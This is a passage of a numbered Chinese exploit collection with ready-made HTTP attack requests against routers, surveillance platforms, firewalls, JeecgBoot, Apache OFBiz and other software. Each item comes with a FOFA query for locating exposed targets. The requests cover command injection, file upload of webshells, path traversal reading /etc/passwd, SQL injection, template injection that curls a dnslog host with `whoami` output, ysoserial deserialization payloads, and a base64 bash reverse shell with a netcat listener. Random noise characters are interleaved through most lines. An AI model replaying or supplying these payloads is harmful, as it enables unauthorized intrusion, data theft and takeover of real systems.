GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1. x& w: s5 [, g+ ^( y" l
Host: x.x.x.x: r* G) v$ A# Y$ P. U6 a
1 p3 z$ C" O9 b8 O0 ?4 i
- C% l' p% B3 i0 B& w+ r3 N79. BYTEVALUE 百为流控路由器远程命令执行7 c- a V: G9 c( u k
FOFA:BYTEVALUE 智能流控路由器
/ G2 U+ n3 M) |, P4 z0 {5 {GET /goform/webRead/open/?path=|id HTTP/1.1
$ L) n: m6 L3 m* M7 o9 \Host:IP
# l4 Q+ c' r! Y3 m( \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0% X2 M% r( K0 v: F) S( {3 d/ b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& ^, q( W6 H$ q+ C6 B* {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! ]1 L2 R" L6 a5 R
Accept-Encoding: gzip, deflate
( g7 [# W6 y6 z) n+ w: RConnection: close* z) O. a; h3 M) y+ e
Upgrade-Insecure-Requests: 1' @! q% D. x+ A) |! x
8 t- P5 R' s! W. i
, n, T6 `! K; Z$ C% x80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传; s- r7 K, O/ F3 e; [% g# D R
FOFA:app="速达软件-公司产品"
/ n# w" F. S: @- J. h' W8 I3 ^, |POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1: b, I9 r% `8 G$ c1 v
Host: x.x.x.x
5 o/ a# P3 w1 | H. rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 y) _$ ]# \* n! F6 D
Content-Length: 27
b9 `4 W/ g6 F: aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: F: |3 U' d8 J, {1 @Accept-Encoding: gzip, deflate; M' v$ s2 w9 d8 u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; X5 p3 L( X+ w$ ZConnection: close
; y$ \) x( u, R" M1 i4 wContent-Type: application/octet-stream# t' y/ Q7 L# k0 l% ]
Upgrade-Insecure-Requests: 1
4 T" t+ p5 n2 [( {8 I
& H$ o, |, A3 i% k<% out.print("oessqeonylzaf");%>
% E& N* y6 t7 c( F5 \4 A9 ?. O- f7 H+ j W" f
9 T1 H. u0 S( |( DGET /xykqmfxpoas.jsp HTTP/1.1
8 J; |! C0 j3 x; F+ _' _8 I& p1 jHost: x.x.x.x
: i V& B, u" k" ^7 B2 B' M1 RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& m- x; h) r. c- v+ ?/ g% Q
Connection: close2 x3 A/ V- W2 `( f
Accept-Encoding: gzip
! j2 T3 A0 [" k+ T; W* h: k! M; ]+ L8 o6 ]7 X( ?6 G' K
3 N; a L2 a; A$ v- K
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露% S/ ~! c3 b- M8 x0 P9 W( N+ f
FOFA:app="uniview-视频监控"
4 U" o1 w+ x- o6 N# R- hGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1- e: e% X% Z4 a ~" J5 S; [
Host: x.x.x.x
. ~* ], R1 `2 w. Q- i$ sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 B: j) [8 k/ T. |. p7 W6 a3 H& S' V& `Connection: close- c2 t2 T& n- U; Q( K
Accept-Encoding: gzip6 C( v4 d L/ [" D. g1 w N
, p6 R: I4 V: a7 `0 n
. F, y K9 d: b" Y& ]82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行2 S% ~# m* {0 j! x
FOFA:app="思福迪-LOGBASE"" I2 b# A, X+ G. T( I' f
POST /bhost/test_qrcode_b HTTP/1.12 |, {4 W# J; z
Host: BaseURL& \: |% h" i7 h
User-Agent: Go-http-client/1.1
" R1 G: [6 l' \& V+ n& y, ?Content-Length: 23
6 ]" b* L$ q/ z- N& _+ A: p+ HAccept-Encoding: gzip7 _( T* D2 E9 J6 ~8 `
Connection: close
2 D( N I4 a3 qContent-Type: application/x-www-form-urlencoded" E6 H8 i" V$ g! a
Referer: BaseURL: v3 ~1 F+ Q2 M! W! A1 D0 b
: R3 T- T% K2 L" E1 G1 wz1=1&z2="|id;"&z3=bhost+ c8 k3 h" G0 A6 l
4 [. \+ x* B0 {0 t6 I9 u; K4 G
( a& [+ x9 m1 c: D) g& M83. JeecgBoot testConnection 远程命令执行
( b% ]$ k" [) ]' U3 n( c4 g7 K. iFOFA:title=="JeecgBoot 企业级低代码平台" d& [0 S4 d. ^) b* R" S
5 G! q8 Q2 _* _/ V$ Z
' S" D) n8 Y1 z5 }& v+ lPOST /jmreport/testConnection HTTP/1.1
, x. i+ I) x7 Y9 O1 BHost: x.x.x.x
0 R! Y; g7 c& @- O1 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 {! p6 |# h; r2 d3 F- [- x" BConnection: close- z5 ?5 _$ f- I; p/ y X- A
Content-Length: 8881/ Z3 J' |5 d }1 w" t* ~) \ h9 |
Accept-Encoding: gzip F9 {* Y: w& T3 _0 C
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
+ b2 j, N% `# Z, E3 v* ?Content-Type: application/json# \4 H2 A P& X/ y
}$ R. Z$ r; |, R+ ?
PAYLOAD
( ]( M: h' q% K% v& b4 x
3 ]1 `3 U. ?5 w/ y* a4 |6 e9 ~/ w84. Jeecg-Boot JimuReport queryFieldBySql 模板注入1 ~. G" I7 P0 ~9 T0 r/ A0 n4 v3 i
FOFA:title=="JeecgBoot 企业级低代码平台"
5 R. N3 }' L- j. T. U" M B q8 {! }8 ~% y. _6 M V+ g
' l# f0 B/ Z: \2 N; H) A2 I. ^8 y& D3 ]
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
1 }1 g: a; Y8 Q. R! o) sHost: 192.168.40.130:80803 r. Z7 s: G( W+ Y3 F) ]( z
User-Agent: curl/7.88.10 g1 H' f) e2 {3 ]
Content-Length: 156- n% t- W6 V2 G% H* r0 l7 u( c
Accept: */*
% f1 T: f' M: }9 M4 }- y/ Y3 WConnection: close1 A0 b* I1 y1 V0 ^+ L- r
Content-Type: application/json0 {: k% f! [( r! d$ E7 }( U3 \
Accept-Encoding: gzip
. ]% F2 x+ [ C) b B7 @
4 f) E) F8 M$ I4 o( x4 C- w" q{
1 t" @3 W* D3 P9 w7 {1 O" m, r# u "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
( g9 H' l7 A4 e% ? "type": "0": o% k; Z# i( V
}
i# g0 n9 E9 s# }1 G0 N5 J. k! X4 I6 d; Y+ B
. F/ c @5 f4 L" T$ ]
85. SysAid On-premise< 23.3.36远程代码执行0 f6 V1 R6 o) _- k# Z6 G; L8 s
CVE-2023-47246
3 z6 k( P; h, e1 S: bFOFA:body="sysaid-logo-dark-green.png"
8 A- c* y( j1 z% y& m v ~EXP数据包如下,注入哥斯拉马& ]' X& r6 Y. u3 o9 t5 Q- B
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1' F& P( B2 ?& J2 m- D, x6 P, j) X
Host: x.x.x.x
- b) {' e! ^3 M$ `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: f) T: j$ V. ^( b4 ~
Content-Type: application/octet-stream
/ i9 {$ R# q) Y3 N% ?0 ]Accept-Encoding: gzip2 m5 s* D9 n) r& Y1 a& l4 h' V) q
; }' x0 {5 _" U4 J6 X5 B
PAYLOAD8 L+ h6 A" s; l& y- }) T$ {
# s1 w. [! `- p$ q: [" [回显URL:http://x.x.x.x/userfiles/index.jsp# S6 W K( Y. I( c
6 g% z, o& h$ ` e$ j2 N& f
86. 日本tosei自助洗衣机RCE& j5 r- ?1 h. Z9 x( F0 B1 a
FOFA:body="tosei_login_check.php" p* x" a& q+ H' p1 { K7 p, H
POST /cgi-bin/network_test.php HTTP/1.1
3 Y0 W+ G' g( T! J0 a& r* G, gHost: x.x.x.x
2 m" {+ g6 W) d @/ z% WUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
4 w# e/ Q$ `% S. N% XConnection: close5 e( I& ~6 ?$ P* E
Content-Length: 445 s3 h8 `4 L% A1 {9 m% Q& n# B0 v
Accept: */*
$ l$ _( Z) g$ `6 r4 aAccept-Encoding: gzip3 ?# Z: `: \7 i( ~
Accept-Language: en/ _2 Q' R# L. f& K9 E ~, |! g
Content-Type: application/x-www-form-urlencoded1 c0 f, N5 e1 n8 d0 F( _
8 Y7 I0 L% D* ?+ ~/ bhost=%0acat${IFS}/etc/passwd%0a&command=ping& I7 A* z/ k7 G0 {1 l* L4 j! x
# U. F- C! \! Q. J1 H. F0 ^6 S" X u6 [3 ~
87. 安恒明御安全网关aaa_local_web_preview文件上传
/ G; u9 w, G7 }5 c& Z" kFOFA:title="明御安全网关", n# {2 E2 z4 J' r S9 K7 Q9 x: `
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.11 Z& M& U+ ^% {* K0 Z
Host: X.X.X.X G; ~/ | C! A# @4 \4 I1 r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! _7 p% O+ {9 ~4 V# oConnection: close
1 B* l9 o. F1 W; T0 o4 WContent-Length: 198
6 ~! z$ k5 v7 {! Y0 b- u& PAccept-Encoding: gzip
; G% Z8 u! s7 }7 R0 GContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd! i5 t0 s) g. {! j) s
i% |8 R+ ~( u1 P# s6 J! ?8 n
--qqobiandqgawlxodfiisporjwravxtvd( I0 n' L6 J1 G' ~
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"; M4 _7 \# f) X/ u
Content-Type: text/plain
& }+ g* M8 C2 n% F# h' T4 c( Z$ B" R0 c0 M% H% W a; {$ E1 g
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
5 E: ]' A; X2 X1 @4 ^2 y6 A' |( j--qqobiandqgawlxodfiisporjwravxtvd--0 t+ M( j o& ~& g6 I2 }4 g! V
$ z& g( V3 _( k0 R5 |5 B
! L( ~9 E0 r+ W/jfhatuwe.php
9 z2 _/ K& y3 D C3 R! ]9 y
# p* n; d& v+ g88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行7 X2 i5 P ]% i1 g2 \8 s- R$ Q
FOFA:title="明御安全网关") ?' }- z. i/ D% q0 B+ E5 o3 U
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
; F5 [9 g+ H9 C. j3 aHost: x.x.x.xx.x.x.x# y; Q$ K* K5 q2 C* J( w8 Q$ _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; u1 n, N" i* Z* R& t5 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- [; g# O1 M W: @' C+ j9 N# jAccept-Encoding: gzip, deflate
9 U, n8 r( o7 j/ k3 B5 HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: @& w" m2 d% T' m0 _
Connection: close
2 }6 S3 r2 Q F* X$ u& ~$ y3 Q2 X1 U
! X, N- `( ]: D$ G5 n/astdfkhl.php
$ F+ I5 O) `" g8 X3 n5 A
) g" _8 Q3 O- w9 h. F9 J# F0 E& j89. 致远互联FE协作办公平台editflow_manager存在sql注入
+ E5 S2 G7 u0 P; R& W& C% pFOFA:title="FE协作办公平台" || body="li_plugins_download"2 v9 l) v1 N1 J. {. M | l
POST /sysform/003/editflow_manager.js%70 HTTP/1.1: {% H1 G3 [2 V$ k, Y
Host: x.x.x.x: X) ~) h, Z {9 z9 z6 ]# S0 M; q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* E3 J9 z2 P% {$ t' f8 B: P: u( eConnection: close
5 [9 W* ~6 l8 EContent-Length: 41, d5 z+ x7 ^: R7 m1 }
Content-Type: application/x-www-form-urlencoded" S8 p- ~) l+ M! F" E9 f
Accept-Encoding: gzip' P( T5 J, b- ]/ s! t7 k
, L5 D$ a5 _8 U
option=2&GUID=-1'+union+select+111*222--+1 W4 q, I" q" R
0 [% i6 P6 |4 L' ^" w4 P- }9 y9 V2 E9 c5 k) f% O4 A
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
& k7 v, p( l: I5 p2 @FOFA:icon_hash="-1830859634"% V5 N+ H; M3 A& F; u- n
POST /php/ping.php HTTP/1.1
5 N% y0 m- D" c2 r/ U: ^( ~Host: x.x.x.x: K, d3 I9 s; ~" e% W3 s( Q0 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
' D _- k% v$ o6 lContent-Length: 51
! w: [+ v+ K9 M8 X" \Accept: application/json, text/javascript, */*; q=0.016 \& d8 w# Y3 j: O+ o' V: C
Accept-Encoding: gzip, deflate
2 W4 M7 W/ w7 w' R' F5 E4 d; kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- [: M* S. B, m- r% u
Connection: close$ k" e3 q/ Q v! H7 x
Content-Type: application/x-www-form-urlencoded* ?, V. h2 }4 S1 a# ]
X-Requested-With: XMLHttpRequest& k% ~7 J1 Q: @! q
/ I5 S' i2 B; ]8 V/ _jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig* ]) n/ \' {. k0 g/ [9 b
/ B: X8 n" w% w. m2 b a$ b1 }6 M
# C& D7 H* ]! G; C
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取8 n0 f4 X% g2 A2 ~2 O- r- Q, y* ^
FOFA:title="综合安防管理平台"
4 {) U5 V6 G0 ^6 z# ]! H7 P, g2 d3 W5 AGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.14 S8 p+ S8 E/ l0 w& u3 R
Host: your-ip) c# w* [, V2 H4 `6 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
& E$ \# }. X- K" nAccept-Encoding: gzip, deflate' V5 j& W& u; k! L: b) P
Accept: */*
" w( I3 A" e- N9 \0 [: I, v3 A1 hConnection: keep-alive
0 A' w) u" F- @- q
& T2 M: H' {6 q- ]! g! o" W. r% [( S& t% P, z" n5 i q [
/ l9 Z: K& \$ N, |92. 海康威视运行管理中心session命令执行
" A& V" }4 V* ^0 _$ ^8 J9 NFastjson命令执行6 H( l- p2 v. c) _
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
; R; ]( p6 J! Y; ?7 ePOST /center/api/session HTTP/1.16 z" |% x3 H0 s9 n9 S
Host:
7 q7 k c4 K6 X& D& ~% g3 zAccept: application/json, text/plain, */*5 B' p. s. g9 [) {7 S# m/ H
Accept-Encoding: gzip, deflate
7 |9 q; G3 X$ |6 z- c7 V! d+ RX-Requested-With: XMLHttpRequest4 ?; j8 Y- f; N7 h
Content-Type: application/json;charset=UTF-8
% w5 R- ^, |. {) l' F% u. `X-Language-Type: zh_CN2 h# J: y# l, D6 g- Q8 d6 ~; K
Testcmd: echo test6 Z. o3 I# ]/ J1 g! v8 H. M4 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.362 [# j, S9 L; S1 d$ r/ o v; V
Accept-Language: zh-CN,zh;q=0.9- @% c8 p$ M- X+ A5 b2 d
Content-Length: 57785 N7 c7 j+ g8 B' v. n Y T
/ |0 W6 C" V4 Y u& f8 }% d" ]PAYLOAD7 B! q& I( n) \5 i/ I: ?. w
3 T9 ^4 T% O% t2 _' s, c& T. B" Y0 q5 t, ^
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传/ ~3 `2 z* q( b7 C
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
) {& f; O: a8 L( e' X3 VPOST /?g=app_av_import_save HTTP/1.1
7 F1 X" a, x" e, G5 I5 SHost: x.x.x.x
- s! F" k' L$ UContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
5 Y1 K0 X( \4 G6 B, U3 ?User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 W j0 G0 H8 `( Z" E6 Y" }- t7 l
------WebKitFormBoundarykcbkgdfx
: _. L( }6 O5 A+ k) uContent-Disposition: form-data; name="MAX_FILE_SIZE". f8 T3 s- E* a3 ~- B6 y1 u
$ M4 J+ @5 T4 K3 A10000000
* M3 ]9 }' w- _. z5 c% y------WebKitFormBoundarykcbkgdfx. y% o: j% L. ~0 i: b+ s9 |
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"( u: |; {/ i& H+ X4 \& G/ A0 D7 G
Content-Type: text/plain
# ]/ V1 ?' q8 Y u) j
/ x* M+ }: W1 g$ Cwagletqrkwrddkthtulxsqrphulnknxa0 A$ g' x( r7 P; f0 B* O! H: Y
------WebKitFormBoundarykcbkgdfx
( ~4 {9 o: Q, P" [Content-Disposition: form-data; name="submit_post"
+ V$ T" E0 P3 }8 K( ^$ v) R
! q o0 e* V& Y, N1 hobj_app_upfile
1 |2 n. h" ^0 M6 M. Y------WebKitFormBoundarykcbkgdfx
' ?% J- k4 N6 v5 e" Y& DContent-Disposition: form-data; name="__hash__"
. \. s% ^5 q- F- m o3 _' J
/ D+ Z# Q( S7 J1 F% }0b9d6b1ab7479ab69d9f71b05e0e9445 t) h! C: f7 s( h# l
------WebKitFormBoundarykcbkgdfx--( Y8 C1 e2 z% J/ I- V4 v
% @' I% @- }4 ]9 [' P' S
3 I0 R* G$ c+ k# _( ?GET /attachements/xlskxknxa.txt HTTP/1.1
# P8 O8 E# v H+ A2 }7 D3 KHost: xx.xx.xx.xx
- j; x. _5 t6 V9 g" v$ ], J# u% U! vUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ i+ w$ b8 W y! w' I' Q# e: c% S, _8 r( b* j% G1 h
0 V# @5 Y7 L8 M# @ a- O: X5 L
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传# |. ~" Q. [2 j
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="/ j) M: l- E9 L$ Z* m R, q0 X
POST /?g=obj_area_import_save HTTP/1.1
: f [6 w7 i1 X3 H3 THost: x.x.x.x
( u) ]- c( z3 EContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt3 y; E6 w/ [6 ]$ J' P9 b. v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* A, v* A# P/ e; p. y$ ?6 X
. `. D! s' M z+ ~; r
------WebKitFormBoundarybqvzqvmt, J) r( l- o2 a/ K* v( ^$ o3 R
Content-Disposition: form-data; name="MAX_FILE_SIZE": o+ t3 K* ~4 M' q
2 C/ p, m) s- Y- g( ?10000000
$ Y9 ]; b1 H+ m) j/ D------WebKitFormBoundarybqvzqvmt
?9 E7 A/ j) q7 j8 [$ H7 EContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
# W9 N5 K8 r$ ^Content-Type: text/plain
2 l9 S! G0 V3 E) x7 j2 I! I4 }- M) r
pxplitttsrjnyoafavcajwkvhxindhmu/ o& a7 B& Y: r' |& c( o) E
------WebKitFormBoundarybqvzqvmt4 q0 j7 h* |7 C# v+ A2 p9 u
Content-Disposition: form-data; name="submit_post"- B. B4 p& V' i$ m6 @- u) E/ u
1 @+ V n; y" d3 z0 c
obj_app_upfile9 ]* Y* q2 t5 v
------WebKitFormBoundarybqvzqvmt$ W% U( G' _6 l
Content-Disposition: form-data; name="__hash__". L( w# o; h* g. i/ K$ a, q
v A# t) s2 K" G( A7 o5 E0b9d6b1ab7479ab69d9f71b05e0e94453 Y/ t9 J7 D$ V7 J# E7 C" U; N( O
------WebKitFormBoundarybqvzqvmt--
) q- i* S7 K" y0 P7 D! ~; R; M Q0 f( g7 j
6 J- T" G! H; G4 D
* Z# p3 s1 L. q' K6 U, s D
GET /attachements/xlskxknxa.txt HTTP/1.1
f; p: `0 n( DHost: xx.xx.xx.xx3 x' O" V- g/ c) ]& t! w/ Y$ W6 I
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ Y$ J2 x+ M5 ~/ N3 S! A2 c1 v7 D8 |5 c8 {+ A% R* ~+ m: A
. [' ?- @4 ~9 S- j; J
4 _; P! m. F, t$ P+ g
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
$ [ W0 N% w4 U/ f2 | ~& ?. ECVE-2023-49070 K( t' l8 }) m' {" V; u1 H
FOFA:app="Apache_OFBiz"
+ l" l; c, ]0 }POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
6 d. U7 W' V5 h6 e( uHost: x.x.x.x R7 ^5 y5 t9 T" e3 P
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36% b* e* J& c2 m; s% w
Connection: close- n% {6 m) ?! V' X, t; D. F
Content-Length: 8899 N0 L3 f$ f8 T, e
Content-Type: application/xml; d9 ?5 g# |( m$ ?, v
Accept-Encoding: gzip' \4 v' b& l6 d4 B* ?
& g' n6 E& `$ A* p9 J) H) Y. V# w<?xml version="1.0"?>
2 }3 M1 b* B8 B! m$ g<methodCall>3 z5 e' ?1 }3 Q% d! Z1 E+ Q" ^
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>4 |. e* X+ @$ d& @0 Z
<params>
) Q# @! a- K$ _6 Y5 k <param>) J. Y* s6 K4 [+ r2 h
<value>8 Z, \ \8 N# H) y7 t/ G2 @
<struct>
7 j' E4 s8 G1 ~5 u/ u* v, l <member>
0 H) ^" e- ~) A <name>test</name>
- ?/ a% X( d% i9 } <value>( J$ `7 E; a+ |2 e1 D) P* b ~8 u
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
, a, W+ |2 L0 _4 f: u3 P </value>% `' \) h7 c' t* E# o
</member>" R- l* F& o5 @/ a
</struct>
0 R* B% u) s) Q/ |. `$ I& f </value>
+ x9 ?5 z# k* k9 y- y </param>
) i1 U) p/ j+ R" ~7 O8 V0 I/ @6 i3 } </params>
0 k# } i/ H1 j</methodCall>: x' O7 _! k7 D5 X, v
6 Q, P" L. E1 V) T7 F
+ h" x H/ Z, v( H! w. t用ysoserial生成payload$ R( O& \- e, q6 L# A6 L' x. r
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
- p% b$ q) n* d1 Z6 j1 c, l6 K7 n% [1 [
. i7 D' J |- o/ u
将生成的payload替换到上面的POC
0 ?+ `, Z+ g: k0 z- y! VPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.15 ?. O3 k5 p, v) K8 _: ?/ @* ~' ?$ ]
Host: 192.168.40.130:8443$ H- g B. _( J6 ~$ U& v) K& l! z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
/ f6 g0 f( ?7 C7 H" Y% oConnection: close
% S" ^1 T( F2 P) H* SContent-Length: 889
( D5 Z: |- {; X0 J) t- FContent-Type: application/xml
3 \, \, K3 q6 j0 F1 G" s, h/ RAccept-Encoding: gzip
# `7 a- @: q. w. J/ D4 M: T1 ^- S) h
6 s" J6 }$ C3 e# p" F M* wPAYLOAD& g4 x! Z% b9 t* i7 c
+ _2 |. B* e" v% O96. Apache OFBiz 18.12.11 groovy 远程代码执行
0 U- C: `8 z. a+ BFOFA:app="Apache_OFBiz"
/ o, I! m- Z7 Z/ E2 _POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1, \: u' z5 C: l# q8 R# |
Host: localhost:8443
" n! f+ X. ~& ]' nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.00 C' E y+ ]( t% r5 X; P) t
Accept: */*/ `) L7 k d" E7 c4 A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 ?+ ^- W+ F' [" } s( \' z( }Content-Type: application/x-www-form-urlencoded! x: O4 @, E5 ^; P( @! K3 r
Content-Length: 55
}* m; i2 N& h# g. j# w* }# W, _* n
groovyProgram=throw+new+Exception('id'.execute().text);
3 Y. Z% E' p7 `4 \3 h: ]' M; P9 e( B
) l) M3 Z6 _; K0 u反弹shell
0 r* ^2 e$ I8 V4 x. A* }. E在kali上启动一个监听3 \4 S" T! k. X$ Z z6 Q
nc -lvp 77773 Q4 ~' Y0 f( n0 f' r
/ j! \' T5 T+ i# B' [POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1! J; \. s6 D1 X; N) g0 a+ s
Host: 192.168.40.130:84432 g& U9 l2 X- H7 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ s+ O# Q n% S( n- FAccept: */* f7 t0 N; _, m4 Q" n) R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' ?+ q2 h4 A H, D1 J
Content-Type: application/x-www-form-urlencoded
5 s5 O/ ?7 H2 C% lContent-Length: 71! a" b3 ^8 ]; A2 S
; I/ j2 R) w: Q. K2 U) UgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
4 I* ^# q1 g( U- Q6 e3 ^
9 G' W- ^6 S( q5 @97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行1 p1 Q. N8 F0 I0 i" R
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
" ~7 u1 S$ F( n6 f. N6 A. }- ]# @GET /passport/login/ HTTP/1.1
6 v( S7 T w0 O- xHost: 192.168.40.130:8085
6 d+ j1 k$ H! C _: TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ H& W' V: w0 k# ^' L
Accept-Encoding: gzip2 a3 D9 G! S/ ]/ j! U O6 J7 s
Connection: close1 K& \) }; V4 x a) n* J9 v
Cookie: rememberMe=PAYLOAD* J& \8 m" c# H9 w
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"% a* ~* a- ]! i5 e3 h6 A6 o9 n
1 g, R6 ]: ~3 R |# \; @/ N" U0 q: K
' Y, d4 w) @5 x7 C' Z4 ^% C* m( W E
98. SpiderFlow爬虫平台远程命令执行9 e7 O1 g( q2 |
CVE-2024-0195
) z9 {* Z$ E- F8 wFOFA:app="SpiderFlow"2 ^1 S( M1 R( `2 d3 W- L5 y# L2 a. v
POST /function/save HTTP/1.1
. m9 o. z, @. y* lHost: 192.168.40.130:8088% A* U2 f5 S! h3 r* X) f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 L7 m) @: V0 d, }$ ]8 T+ KConnection: close
) Y) }! f5 @6 u+ w0 y/ UContent-Length: 121$ p: }5 I" }1 P" Y0 v$ S
Accept: */*
8 B, H. w9 l: M x$ E0 ZAccept-Encoding: gzip, deflate# c8 ]2 i$ |: ]- Q% h" ]
